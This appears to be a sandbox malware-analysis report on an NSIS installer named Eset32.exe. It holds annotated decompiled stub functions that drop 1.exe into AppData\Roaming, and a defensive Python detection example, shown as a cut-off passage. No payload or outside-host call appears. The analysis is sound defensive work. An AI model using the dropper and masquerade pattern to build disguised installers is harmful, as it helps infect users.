                                                          C-Code - Quality: 61%
                                                          			E00401759(FILETIME* __ebx, void* __eflags) {
                                                          				void* _t33;
                                                          				void* _t41;
                                                          				void* _t43;
                                                          				FILETIME* _t49;
                                                          				FILETIME* _t62;
                                                          				void* _t64;
                                                          				signed int _t70;
                                                          				FILETIME* _t71;
                                                          				FILETIME* _t75;
                                                          				signed int _t77;
                                                          				void* _t80;
                                                          				CHAR* _t82;
                                                          				CHAR* _t83;
                                                          				void* _t85;
                                                          
                                                           				_t75 = __ebx;
                                                           				// Destination name of this File instruction (resolved to
                                                           				// C:\Users\...\AppData\Roaming\1.exe in this run). The low three bits of
                                                           				// the instruction flags select how an existing file is handled below.
                                                           				_t82 = E00402BCE(0x31);
                                                           				 *(_t85 - 8) = _t82;
                                                           				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                           				_t33 = E00405AFC(_t82);
                                                           				_push(_t82);
                                                           				_t83 = "C:\\Users\\alfons\\AppData\\Roaming\\1.exe";
                                                           				if(_t33 == 0) {
                                                           					// Relative name: prepend the output directory (the second lstrcatA
                                                           					// argument was not recovered by the decompiler)
                                                           					lstrcatA(E00405A8F(E004060F7(_t83, "C:\\Users\\alfons\\AppData\\Roaming")), ??);
                                                          				} else {
                                                          					E004060F7();
                                                          				}
                                                          				E004063D2(_t83);
                                                          				while(1) {
                                                          					__eflags =  *(_t85 + 8) - 3;
                                                           					if( *(_t85 + 8) >= 3) {
                                                           						// Modes 3 and 4: find the existing file and compare its last-write
                                                           						// time (ftLastWriteTime sits at offset 0x14 of WIN32_FIND_DATAA)
                                                           						// with the timestamp stored in the installer
                                                           						_t64 = E0040646B(_t83);
                                                           						_t77 = 0;
                                                           						__eflags = _t64 - _t75;
                                                           						if(_t64 != _t75) {
                                                           							_t71 = _t64 + 0x14;
                                                           							__eflags = _t71;
                                                           							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                          						}
                                                          						asm("sbb eax, eax");
                                                          						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                          						__eflags = _t70;
                                                          						 *(_t85 + 8) = _t70;
                                                          					}
                                                          					__eflags =  *(_t85 + 8) - _t75;
                                                           					if( *(_t85 + 8) == _t75) {
                                                           						E00405C6B(_t83); // mode 0 (always overwrite): prepare the existing file before replacing it
                                                           					}
                                                           					__eflags =  *(_t85 + 8) - 1;
                                                           					// Open for GENERIC_WRITE (0x40000000) with CREATE_NEW (1) in mode 1,
                                                           					// CREATE_ALWAYS (2) in every other mode
                                                           					_t41 = E00405C90(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                          					__eflags = _t41 - 0xffffffff;
                                                          					 *(_t85 - 0xc) = _t41;
                                                          					if(_t41 != 0xffffffff) {
                                                          						break;
                                                          					}
                                                           					__eflags =  *(_t85 + 8) - _t75;
                                                           					if( *(_t85 + 8) != _t75) {
                                                           						// Open failed in a non-overwrite mode: report the skip in the status
                                                           						// text; mode 2 additionally counts it as an error
                                                           						E0040521E(0xffffffe2,  *(_t85 - 8));
                                                          						__eflags =  *(_t85 + 8) - 2;
                                                          						if(__eflags == 0) {
                                                          							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                          						}
                                                          						L31:
                                                          						 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t85 - 4));
                                                          						__eflags =  *0x42f4c8;
                                                          						goto L32;
                                                          					} else {
                                                           						E004060F7(0x40ac38, 0x430000);
                                                           						E004060F7(0x430000, _t83);
                                                           						E0040618A(_t75, 0x40ac38, _t83, "C:\\Users\\alfons\\AppData\\Roaming",  *((intOrPtr*)(_t85 - 0x14)));
                                                           						E004060F7(0x430000, 0x40ac38);
                                                           						// Open failed in mode 0: show the message box and map its result
                                                           						// (button id - 4) to retry (0), ignore (1) or abort (anything else)
                                                           						_t62 = E00405813("C:\\Users\\alfons\\AppData\\Roaming",  *(_t85 - 0x28) >> 3) - 4;
                                                          						__eflags = _t62;
                                                          						if(_t62 == 0) {
                                                          							continue;
                                                          						} else {
                                                          							__eflags = _t62 == 1;
                                                          							if(_t62 == 1) {
                                                          								 *0x42f4c8 =  &( *0x42f4c8->dwLowDateTime);
                                                          								L32:
                                                          								_t49 = 0;
                                                          								__eflags = 0;
                                                          							} else {
                                                          								_push(_t83);
                                                          								_push(0xfffffffa);
                                                          								E0040521E();
                                                          								L29:
                                                          								_t49 = 0x7fffffff;
                                                          							}
                                                          						}
                                                          					}
                                                          					L33:
                                                          					return _t49;
                                                          				}
                                                           				E0040521E(0xffffffea,  *(_t85 - 8)); // status text for the file being extracted
                                                           				 *0x42f4f4 =  *0x42f4f4 + 1;
                                                           				_push(_t75);
                                                           				_push(_t75);
                                                           				_push( *(_t85 - 0xc));
                                                           				_push( *((intOrPtr*)(_t85 - 0x20)));
                                                           				_t43 = E004030D8(); // executed: decompresses the embedded data block into the open handle
                                                           				 *0x42f4f4 =  *0x42f4f4 - 1;
                                                           				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                           				_t80 = _t43;
                                                           				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                           					L22:
                                                           					// Apply the stored timestamp (creation and last-write, access left
                                                           					// untouched) unless it is the -1/-1 "not set" marker
                                                           					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                                                          				} else {
                                                          					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                                          					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                                          						goto L22;
                                                          					}
                                                          				}
                                                           				// Resolved as FindCloseChangeNotification because kernel32 exports it at
                                                           				// the same implementation as CloseHandle: this closes the output file
                                                           				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
                                                           				__eflags = _t80 - _t75;
                                                           				if(_t80 >= _t75) {
                                                           					goto L31;
                                                           				} else {
                                                           					// Extraction failed: two different error strings depending on the
                                                           					// return code; -2 appends the file name
                                                           					__eflags = _t80 - 0xfffffffe;
                                                           					if(_t80 != 0xfffffffe) {
                                                          						E0040618A(_t75, _t80, _t83, _t83, 0xffffffee);
                                                          					} else {
                                                          						E0040618A(_t75, _t80, _t83, _t83, 0xffffffe9);
                                                          						lstrcatA(_t83,  *(_t85 - 8));
                                                          					}
                                                          					_push(0x200010);
                                                          					_push(_t83);
                                                          					E00405813();
                                                          					goto L29;
                                                          				}
                                                          				goto L33;
                                                          			}

                                                          APIs
                                                          • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Roaming\1.exe,C:\Users\user\AppData\Roaming,00000000,00000000,00000031), ref: 00401798
                                                          • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Roaming\1.exe,C:\Users\user\AppData\Roaming\1.exe,00000000,00000000,C:\Users\user\AppData\Roaming\1.exe,C:\Users\user\AppData\Roaming,00000000,00000000,00000031), ref: 004017C2
                                                            • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Name Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00428145,76DDEA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00428145,76DDEA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                            • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00428145,76DDEA30), ref: 0040527A
                                                            • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                            • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052B2
                                                            • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052CC
                                                            • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052DA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\1.exe
                                                          • API String ID: 1941528284-1198725897
                                                          • Opcode ID: 5509bd2040818d087d1bebcb726dff50be1ad66580b10ce54bc1622c5aeaffaf
                                                          • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                          • Opcode Fuzzy Hash: 5509bd2040818d087d1bebcb726dff50be1ad66580b10ce54bc1622c5aeaffaf
                                                          • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                           Control-flow Graph
                                                           (rendered graph; executed/not-executed colouring not reproduced in text) Basic blocks 406492 to 4064fd. API calls in the graph: GetSystemDirectoryA, wsprintfA, LoadLibraryExA.
                                                          C-Code - Quality: 100%
                                                           			E00406492(intOrPtr _a4) {
                                                           				char _v292;
                                                           				int _t10;
                                                           				struct HINSTANCE__* _t14;
                                                           				void* _t16;
                                                           				void* _t21;

                                                           				// Build "<SystemDirectory>\<_a4>.dll" in the 0x104-byte stack buffer and
                                                           				// load it by full path; _a4 is the bare module name ("UXTHEME" in the
                                                           				// strings below). Loading from System32 by absolute path rather than
                                                           				// by bare name avoids the DLL search-order hijack.
                                                           				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                                           				if(_t10 > 0x104) {
                                                           					_t10 = 0; // buffer too small: fall through with an empty directory
                                                           				}
                                                           				// Only add a separator if the directory does not already end in "\"
                                                           				// (_t21 + _t10 - 0x121 is the last character of _v292)
                                                           				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                                           					_t16 = 1;
                                                           				} else {
                                                           					_t16 = 0;
                                                           				}
                                                           				_t5 = _t16 + 0x40a014; // 0x5c: "\" at 0x40a014, or the empty string after it when _t16 == 1
                                                           				// Caveat: if GetSystemDirectoryA failed (_t10 == 0) the prefix is empty and
                                                           				// this degrades to a relative "<name>.dll" load
                                                           				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                                           				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed; 8 = LOAD_WITH_ALTERED_SEARCH_PATH
                                                           				return _t14;
                                                           			}

                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32 ref: 004064A9
                                                          • wsprintfA.USER32 ref: 004064E2
                                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%s.dll$UXTHEME$\
                                                          • API String ID: 2200240437-4240819195
                                                          • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                          • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                                                          • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                          • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 408 4030d8-4030ec 409 4030f5-4030fe 408->409 410 4030ee 408->410 411 403100 409->411 412 403107-40310c 409->412 410->409 411->412 413 40311c-403129 call 4032ea 412->413 414 40310e-403117 call 403300 412->414 418 4032d8 413->418 419 40312f-403133 413->419 414->413 420 4032da-4032db 418->420 421 403283-403285 419->421 422 403139-403182 GetTickCount 419->422 425 4032e3-4032e7 420->425 423 4032c5-4032c8 421->423 424 403287-40328a 421->424 426 4032e0 422->426 427 403188-403190 422->427 428 4032ca 423->428 429 4032cd-4032d6 call 4032ea 423->429 424->426 430 40328c 424->430 426->425 431 403192 427->431 432 403195-4031a3 call 4032ea 427->432 428->429 429->418 440 4032dd 429->440 434 40328f-403295 430->434 431->432 432->418 442 4031a9-4031b2 432->442 437 403297 434->437 438 403299-4032a7 call 4032ea 434->438 437->438 438->418 446 4032a9-4032b5 call 405d37 438->446 440->426 443 4031b8-4031d8 call 406625 442->443 450 40327b-40327d 443->450 451 4031de-4031f1 GetTickCount 443->451 452 4032b7-4032c1 446->452 453 40327f-403281 446->453 450->420 454 4031f3-4031fb 451->454 455 403236-403238 451->455 452->434 456 4032c3 452->456 453->420 457 403203-403233 MulDiv wsprintfA call 40521e 454->457 458 4031fd-403201 454->458 459 40323a-40323e 455->459 460 40326f-403273 455->460 456->426 457->455 458->455 458->457 463 403240-403247 call 405d37 459->463 464 403255-403260 459->464 460->427 461 403279 460->461 461->426 469 40324c-40324e 463->469 465 403263-403267 464->465 465->443 468 40326d 465->468 468->426 469->453 470 403250-403253 469->470 470->465
                                                          C-Code - Quality: 95%
                                                          			E004030D8(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                          				signed int _v8;
                                                          				int _v12;
                                                          				intOrPtr _v16;
                                                          				long _v20;
                                                          				intOrPtr _v24;
                                                          				char _v88;
                                                          				void* _t65;
                                                          				long _t70;
                                                          				intOrPtr _t75;
                                                          				long _t76;
                                                          				intOrPtr _t77;
                                                          				void* _t78;
                                                          				int _t88;
                                                          				intOrPtr _t92;
                                                          				intOrPtr _t95;
                                                          				long _t96;
                                                          				signed int _t97;
                                                          				int _t98;
                                                          				int _t99;
                                                          				intOrPtr _t100;
                                                          				void* _t101;
                                                          				void* _t102;
                                                          
                                                          				_t97 = _a16;
                                                          				_t92 = _a12;
                                                          				_v12 = _t97;
                                                          				if(_t92 == 0) {
                                                          					_v12 = 0x8000;
                                                          				}
                                                          				_v8 = _v8 & 0x00000000;
                                                          				_v16 = _t92;
                                                          				if(_t92 == 0) {
                                                          					_v16 = 0x421448;
                                                          				}
                                                          				_t62 = _a4;
                                                          				if(_a4 >= 0) {
                                                          					E00403300( *0x42f498 + _t62);
                                                          				}
                                                          				if(E004032EA( &_a16, 4) == 0) {
                                                          					L41:
                                                          					_push(0xfffffffd);
                                                          					goto L42;
                                                          				} else {
                                                          					if((_a19 & 0x00000080) == 0) {
                                                          						if(_t92 != 0) {
                                                          							if(_a16 < _t97) {
                                                          								_t97 = _a16;
                                                          							}
                                                          							if(E004032EA(_t92, _t97) != 0) {
                                                          								_v8 = _t97;
                                                          								L44:
                                                          								return _v8;
                                                          							} else {
                                                          								goto L41;
                                                          							}
                                                          						}
                                                          						if(_a16 <= _t92) {
                                                          							goto L44;
                                                          						}
                                                          						_t88 = _v12;
                                                          						while(1) {
                                                          							_t98 = _a16;
                                                          							if(_a16 >= _t88) {
                                                          								_t98 = _t88;
                                                          							}
                                                          							if(E004032EA(0x41d448, _t98) == 0) {
                                                          								goto L41;
                                                          							}
                                                          							if(E00405D37(_a8, 0x41d448, _t98) == 0) {
                                                          								L28:
                                                          								_push(0xfffffffe);
                                                          								L42:
                                                          								_pop(_t65);
                                                          								return _t65;
                                                          							}
                                                          							_v8 = _v8 + _t98;
                                                          							_a16 = _a16 - _t98;
                                                          							if(_a16 > 0) {
                                                          								continue;
                                                          							}
                                                          							goto L44;
                                                          						}
                                                          						goto L41;
                                                          					}
                                                          					_t70 = GetTickCount();
                                                          					 *0x40bdac =  *0x40bdac & 0x00000000;
                                                          					 *0x40bda8 =  *0x40bda8 & 0x00000000;
                                                          					_t14 =  &_a16;
                                                          					 *_t14 = _a16 & 0x7fffffff;
                                                          					_v20 = _t70;
                                                          					 *0x40b890 = 8;
                                                          					 *0x415438 = 0x40d430;
                                                          					 *0x415434 = 0x40d430;
                                                          					 *0x415430 = 0x415430;
                                                          					_a4 = _a16;
                                                          					if( *_t14 <= 0) {
                                                          						goto L44;
                                                          					} else {
                                                          						goto L9;
                                                          					}
                                                          					while(1) {
                                                          						L9:
                                                          						_t99 = 0x4000;
                                                          						if(_a16 < 0x4000) {
                                                          							_t99 = _a16;
                                                          						}
                                                          						if(E004032EA(0x41d448, _t99) == 0) {
                                                          							goto L41;
                                                          						}
                                                          						_a16 = _a16 - _t99;
                                                          						 *0x40b880 = 0x41d448;
                                                          						 *0x40b884 = _t99;
                                                          						while(1) {
                                                          							_t95 = _v16;
                                                          							 *0x40b888 = _t95;
                                                          							 *0x40b88c = _v12;
                                                          							_t75 = E00406625(0x40b880);
                                                          							_v24 = _t75;
                                                          							if(_t75 < 0) {
                                                          								break;
                                                          							}
                                                          							_t100 =  *0x40b888; // 0x428145
                                                          							_t101 = _t100 - _t95;
                                                          							_t76 = GetTickCount();
                                                          							_t96 = _t76;
                                                          							if(( *0x42f4f4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                          								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                          								_t102 = _t102 + 0xc;
                                                          								E0040521E(0,  &_v88);
                                                          								_v20 = _t96;
                                                          							}
                                                          							if(_t101 == 0) {
                                                          								if(_a16 > 0) {
                                                          									goto L9;
                                                          								}
                                                          								goto L44;
                                                          							} else {
                                                          								if(_a12 != 0) {
                                                          									_t77 =  *0x40b888; // 0x428145
                                                          									_v8 = _v8 + _t101;
                                                          									_v12 = _v12 - _t101;
                                                          									_v16 = _t77;
                                                          									L23:
                                                          									if(_v24 != 1) {
                                                          										continue;
                                                          									}
                                                          									goto L44;
                                                          								}
                                                          								_t78 = E00405D37(_a8, _v16, _t101); // executed
                                                          								if(_t78 == 0) {
                                                          									goto L28;
                                                          								}
                                                          								_v8 = _v8 + _t101;
                                                          								goto L23;
                                                          							}
                                                          						}
                                                          						_push(0xfffffffc);
                                                          						goto L42;
                                                          					}
                                                          					goto L41;
                                                          				}
                                                          			}

Instruction addresses (per-line column of the E004030D8 listing, in order; 0x00000000 marks lines with no address):
0x004030e0 0x004030e4 0x004030e7 0x004030ec 0x004030ee 0x004030ee 0x004030f5 0x004030f9
0x004030fe 0x00403100 0x00403100 0x00403107 0x0040310c 0x00403117 0x00403117 0x00403129
0x004032d8 0x004032d8 0x00000000 0x0040312f 0x00403133 0x00403285 0x004032c8 0x004032ca
0x004032ca 0x004032d6 0x004032dd 0x004032e0 0x00000000 0x00000000 0x00000000 0x00000000
0x004032d6 0x0040328a 0x00000000 0x00000000 0x0040328c 0x0040328f 0x00403292 0x00403295
0x00403297 0x00403297 0x004032a7 0x00000000 0x00000000 0x004032b5 0x0040327f 0x0040327f
0x004032da 0x004032da 0x00000000 0x004032da 0x004032b7 0x004032ba 0x004032c1 0x00000000
0x00000000 0x00000000 0x004032c3 0x00000000 0x0040328f 0x0040313f 0x00403141 0x00403148
0x0040314f 0x0040314f 0x00403156 0x0040315e 0x00403168 0x0040316d 0x00403175 0x0040317f
0x00403182 0x00000000 0x00000000 0x00000000 0x00000000 0x00403188 0x00403188 0x00403188
0x00403190 0x00403192 0x00403192 0x004031a3 0x00000000 0x00000000 0x004031a9 0x004031ac
0x004031b2 0x004031b8 0x004031b8 0x004031c3 0x004031c9 0x004031ce 0x004031d5 0x004031d8
0x00000000 0x00000000 0x004031de 0x004031e4 0x004031e6 0x004031ef 0x004031f1 0x0040321f
0x00403225 0x0040322e 0x00403233 0x00403233 0x00403238 0x00403273 0x00000000 0x00000000
0x00000000 0x0040323a 0x0040323e 0x00403255 0x0040325a 0x0040325d 0x00403260 0x00403263
0x00403267 0x00000000 0x00000000 0x00000000 0x0040326d 0x00403247 0x0040324e 0x00000000
0x00000000 0x00403250 0x00000000 0x00403250 0x00403238 0x0040327b 0x00000000 0x0040327b
0x00000000 0x00403188

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CountTick$wsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 551687249-2449383134
                                                          • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                          • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                          • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                          • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 471 405cbf-405cc9 472 405cca-405cf5 GetTickCount GetTempFileNameA 471->472 473 405d04-405d06 472->473 474 405cf7-405cf9 472->474 476 405cfe-405d01 473->476 474->472 475 405cfb 474->475 475->476
                                                          C-Code - Quality: 100%
                                                          			E00405CBF(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                          				char _t11;
                                                          				signed int _t12;
                                                          				int _t15;
                                                          				signed int _t17;
                                                          				void* _t20;
                                                          				CHAR* _t21;
                                                          
                                                          				_t21 = _a4;
                                                          				_t20 = 0x64;
                                                          				while(1) {
                                                          					_t11 =  *0x40a3d4; // 0x61736e
                                                          					_t20 = _t20 - 1;
                                                          					_a4 = _t11;
                                                          					_t12 = GetTickCount();
                                                          					_t17 = 0x1a;
                                                          					_a6 = _a6 + _t12 % _t17;
                                                          					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                                                          					if(_t15 != 0) {
                                                          						break;
                                                          					}
                                                          					if(_t20 != 0) {
                                                          						continue;
                                                          					}
                                                          					 *_t21 =  *_t21 & 0x00000000;
                                                          					return _t15;
                                                          				}
                                                          				return _t21;
                                                          			}

Instruction addresses (per-line column of the E00405CBF listing, in order; 0x00000000 marks lines with no address):
0x00405cc3 0x00405cc9 0x00405cca 0x00405cca 0x00405ccf 0x00405cd0 0x00405cd3 0x00405cdd
0x00405cea 0x00405ced 0x00405cf5 0x00000000 0x00000000 0x00405cf9 0x00000000 0x00000000
0x00405cfb 0x00000000 0x00405cfb 0x00000000

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405CD3
                                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                                                          • nsa, xrefs: 00405CCA
                                                          • "C:\Users\user\Desktop\Eset32.exe" , xrefs: 00405CBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: "C:\Users\user\Desktop\Eset32.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-346580152
                                                          • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                          • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                                                          • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                          • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
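The fragment above is the installer stub naming its working file in the user's Temp directory: the string "nsa" is the prefix, GetTickCount() % 0x1a (26) is added to its third character, and the result is handed to GetTempFileNameA with uUnique = 0, which makes Windows append a time-derived hex value and ".tmp". NSIS stubs then use that name for their working directory (standard NSIS behaviour, not visible in this fragment). The following is an added example, not code from the report or from the sample; it re-creates the naming scheme and runs a hunting heuristic over constructed log lines. It is Python so it runs without the Win32 APIs. The regex, the function names and the sample events are this example's own assumptions; only the Eset32.exe path and the Temp path come from the report.

```python
import re
from typing import List, Tuple

# From the decompiled loop: the literal prefix is "nsa" and the stub adds
# GetTickCount() % 0x1a (26) to its third character before calling
# GetTempFileNameA(temp_dir, prefix, 0, out_buf).
NSIS_PREFIX_BASE = "nsa"
PREFIX_MODULUS = 0x1A


def nsis_temp_prefix(tick_count: int) -> str:
    """Prefix the stub passes to GetTempFileNameA for a given GetTickCount() value."""
    third = chr(ord(NSIS_PREFIX_BASE[2]) + tick_count % PREFIX_MODULUS)
    return NSIS_PREFIX_BASE[:2] + third


def expected_temp_name(tick_count: int, unique: int) -> str:
    """Name GetTempFileNameA produces with uUnique == 0: <prefix><hex>.tmp.

    The hex part is the time-derived 16-bit value written without leading
    zeros; that is documented Win32 behaviour, not something shown on this page.
    """
    if not 0 <= unique <= 0xFFFF:
        raise ValueError("GetTempFileName's unique value is 16 bits")
    return f"{nsis_temp_prefix(tick_count)}{unique:X}.tmp"


# Hunting heuristic (this example's assumption, not a rule from the report):
# ns<letter><1-4 hex digits>.tmp directly under ...\AppData\Local\Temp is the
# name shape the stub produces. Path segments may not contain '"' or ':' so a
# match cannot run across two quoted fields on one log line.
_NSIS_TEMP_RE = re.compile(
    r"(?P<dir>[A-Za-z]:\\(?:[^\\\r\n\":]+\\)*?AppData\\Local\\Temp)"
    r"\\(?P<name>ns[a-z][0-9A-Fa-f]{1,4}\.tmp)(?=[\\\"\s]|$)",
    re.IGNORECASE,
)


def find_nsis_temp_paths(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line index, matched path) for every NSIS-shaped temp path."""
    hits: List[Tuple[int, str]] = []
    for n, line in enumerate(lines):
        for m in _NSIS_TEMP_RE.finditer(line):
            hits.append((n, m.group("dir") + "\\" + m.group("name")))
    return hits


# Constructed sample events in a Sysmon-like key="value" style. Only the
# sample's own path and the Temp path come from the report; the temp name,
# plugin.dll, report.tmp and explorer.exe lines are made up for the test.
SAMPLE_EVENTS = [
    'FileCreate Image="C:\\Users\\user\\Desktop\\Eset32.exe" '
    'TargetFilename="C:\\Users\\user\\AppData\\Local\\Temp\\nsa7F3C.tmp"',
    'ImageLoad Image="C:\\Users\\user\\Desktop\\Eset32.exe" '
    'ImageLoaded="C:\\Users\\user\\AppData\\Local\\Temp\\nsa7F3C.tmp\\plugin.dll"',
    'FileCreate Image="C:\\Windows\\explorer.exe" '
    'TargetFilename="C:\\Users\\user\\AppData\\Local\\Temp\\report.tmp"',
    'FileCreate Image="C:\\Users\\user\\Desktop\\Eset32.exe" '
    'TargetFilename="C:\\Users\\user\\AppData\\Local\\Temp\\nsaGGGG.tmp"',
]

if __name__ == "__main__":
    for tick in (0, 3, 25, 26):
        print(tick, nsis_temp_prefix(tick))
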